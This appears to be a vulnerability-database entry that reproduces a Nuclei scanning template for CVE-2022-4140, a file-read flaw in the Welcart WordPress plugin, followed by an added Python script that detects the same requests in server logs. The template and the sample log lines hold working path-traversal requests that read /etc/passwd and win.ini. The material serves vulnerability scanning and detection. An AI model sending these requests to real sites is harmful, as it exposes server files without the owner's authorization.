nuclei | ProjectDiscovery | NUCLEI:CVE-2022-4140
Mar 31, 2023 - 11:28 a.m.

WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access

2023-03-31 11:28:24
ProjectDiscovery
github.com
Tags: cve, cve2022, usc-e-shop, wpscan, wordpress, lfi, unauthenticated, collne, arbitrary, file access, plugin, fix, security vulnerability

CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS: 0.013 Low
Percentile: 85.8%

WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.
id: CVE-2022-4140

info:
  name: WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access
  author: theamanrawat
  severity: high
  description: |
    WordPress Welcart e-Commerce plugin before 2.8.5 is susceptible to arbitrary file access. The plugin does not validate user input before using it to output the content of a file, which can allow an attacker to read arbitrary files on the server, obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can access sensitive files on the server, potentially exposing sensitive information.
  remediation: Fixed in version 2.8.5.
  reference:
    - https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7
    - https://wordpress.org/plugins/usc-e-shop/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4140
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-4140
    cwe-id: CWE-552
    epss-score: 0.00932
    epss-percentile: 0.82572
    cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: collne
    product: welcart_e-commerce
    framework: wordpress
  tags: cve,cve2022,usc-e-shop,wpscan,wp-plugin,wp,wordpress,lfi,unauthenticated,collne

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd"
      - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950
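
A defender-side check for the request pattern the template above sends, as an added example that is not part of the original page or of ProjectDiscovery's template: it scans web server access logs for requests that pass a logfile value to content-log.php and notes whether a body was served. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter are the ones the template above requests.
ENDPOINT = "/wp-content/plugins/usc-e-shop/functions/content-log.php"
PARAM = "logfile"
# Assumed format: ip - - [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding (bounded) so %252F is read as '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_hits(lines):
    """Return one dict per request that passes a logfile value to the endpoint."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        # Normalise so sub-directory installs and doubled slashes still match.
        path = re.sub(r"/+", "/", fully_unquote(url.path)).lower()
        values = parse_qs(url.query, keep_blank_values=True).get(PARAM)
        if not path.endswith(ENDPOINT) or not values:
            continue
        hits.append({
            "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "logfile": fully_unquote(values[0]),
            # A 200 with a non-empty body means file content may have been returned.
            "served": m["status"] == "200" and m["size"] not in ("-", "0"),
        })
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [31/Mar/2023:11:28:24 +0000] "GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd HTTP/1.1" 200 1843 "-" "-"',
    '203.0.113.7 - - [31/Mar/2023:11:28:25 +0000] "GET /shop/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=%2FWindows%2Fwin.ini HTTP/1.1" 404 196 "-" "-"',
    '198.51.100.4 - - [31/Mar/2023:11:29:02 +0000] "GET /wp-login.php HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.4 - - [31/Mar/2023:11:29:40 +0000] "GET /wp-content/plugins/usc-e-shop/functions/content-log.php HTTP/1.1" 200 0 "-" "-"',
]
if __name__ == "__main__":
    print(*find_hits(SAMPLE), sep="\n")
```

A hit with `served` set to true on a site running a version before 2.8.5 is worth following up by checking which file the decoded `logfile` value names.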
